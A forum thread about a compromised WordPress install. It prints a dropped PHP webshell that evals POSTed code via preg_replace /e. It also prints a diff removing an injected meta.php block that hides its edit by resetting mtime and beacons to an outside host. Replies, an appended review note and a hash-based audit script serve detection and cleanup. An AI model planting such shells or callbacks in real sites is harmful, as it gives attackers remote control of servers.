WordPress site hacked? Suspicious PHP file

I found a suspicious PHP file /wp-includes/mera.php

Content:

<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['vfj39']) && ($www= $_POST['vfj39']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>

Could @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add'); possibly do something malicious?

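doufen1890: Thank you all! I deleted the file and fixed meta.php (see the answer below). Why the 3 downvotes tho?
almost 4 years ago

duanming7961: That code looks like it runs arbitrary code. Delete it, then have a look at this codex page.
almost 4 years ago

doukanxi4246: I'm not sure what the code does, but the file doesn't appear in any WordPress documentation, so unless some application you installed uses it, it is probably malicious.
almost 4 years ago

dt1888: str_rot13('riny') returns eval...
almost 4 years ago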

3 answers




Delete the file instantly!

This PHP code is a modified webshell. Those could be used to attack other websites and could lead to serious legal problems!

After deletion you should also fix the leak that let the file in!

Yes, the PHP script allows running code on the server.

Source: http://wordpressvirusremoval.com/blog/execute-a-php-code-through-post-veriable-with-preg_replace-e-modifier/

Through diff'ing with a clean WP tarball, I found meta.php was modified:

988,1004d987
<
< check_meta();
< function check_meta(){
<     $jp = __FILE__;
<     $jptime = filemtime($jp);
<
<     if(time() >= 1472456239){
<         $jp_c = file_get_contents($jp);
<         if($t = @strpos($jp_c,"check_meta();")) {
<             $contentp = substr($jp_c,0,$t);
<             if(@file_put_contents($jp, $contentp)){
<                 @touch($jp,$jptime);
<             }
<         }
<     }
<     @file_get_contents("http://web.51.la:82/go.asp?svid=1&id=18944722&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/mera.php");
< }
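Review bot: in check_meta(), the `@touch($jp,$jptime)` call puts the file's original modification time back after the block truncates meta.php at the `check_meta();` call, so looking for recently changed files by mtime will miss this edit; compare contents or hashes against a clean WordPress copy, as was done here. The last line, `@file_get_contents("http://web.51.la:82/go.asp?...")`, sits outside the `time()` check and sends the site's hostname and the /wp-includes/mera.php path to an external host each time meta.php is loaded, so outbound requests to that host in proxy or firewall logs are worth searching for. The whole block should be removed together with mera.php.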

FYI, here are the md5sums of infected files:

898af479fe6cc3af461c1878763d19f4  ./wp-includes/meta.php
b657d7c9d9be52771750091df0751fda  ./wp-includes/mera.php




You should install something like the Wordfence plugin on your website, which will check all of the plugin and theme folders continuously against the official release versions. It will also help prevent dangerous file uploads like this.
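The check used in this thread (diffing against a clean WordPress tarball), as an added example that is not part of the original answers: it compares a live tree with a pristine copy by SHA-256 rather than by modification time, since the injected check_meta() resets mtime with touch(), and flags added or changed files that contain a preg_replace() pattern with the /e modifier. The function names, directory layout and sample file contents are constructed for illustration.

```python
import hashlib
import os
import re
import tempfile
from pathlib import Path

# preg_replace() whose pattern literal carries the /e (eval) modifier, removed in PHP 7.0.
PREG_E = re.compile(
    rb"""preg_replace\s*\(\s*(['"])(.)(?:(?!\1).)*?\2[a-zA-Z]*e[a-zA-Z]*\1""", re.S)

def manifest(root):
    """Map relative path -> SHA-256 of the contents of every file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def audit(clean_root, live_root):
    """Compare a live tree with a pristine copy by content, never by mtime."""
    clean, live = manifest(clean_root), manifest(live_root)
    report = {
        "added": sorted(set(live) - set(clean)),
        "modified": sorted(f for f in set(live) & set(clean) if live[f] != clean[f]),
        "missing": sorted(set(clean) - set(live)),
    }
    suspects = report["added"] + report["modified"]
    report["preg_e"] = sorted(
        f for f in suspects if PREG_E.search((Path(live_root) / f).read_bytes()))
    return report

def demo():
    """Audit two constructed trees that mirror the case in this thread."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for root in (clean, live):
            (root / "wp-includes").mkdir(parents=True)
            (root / "wp-includes/meta.php").write_text("<?php // core file\n")
        # Constructed stand-ins for the modified meta.php and the dropped mera.php.
        target = live / "wp-includes/meta.php"
        target.write_text("<?php // core file\ncheck_meta();\n")
        (live / "wp-includes/mera.php").write_text(
            "<?php @preg_replace('/ad/e', '...', 'add');\n")
        # Mimic the touch() trick from the diff: copy the clean file's timestamps.
        st = (clean / "wp-includes/meta.php").stat()
        os.utime(target, (st.st_atime, st.st_mtime))
        return audit(clean, live)

if __name__ == "__main__":
    print(demo())
```

Point `audit()` at an unpacked official tarball of the same WordPress version and at the live docroot; user content under wp-content will appear as "added" and needs its own baseline.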
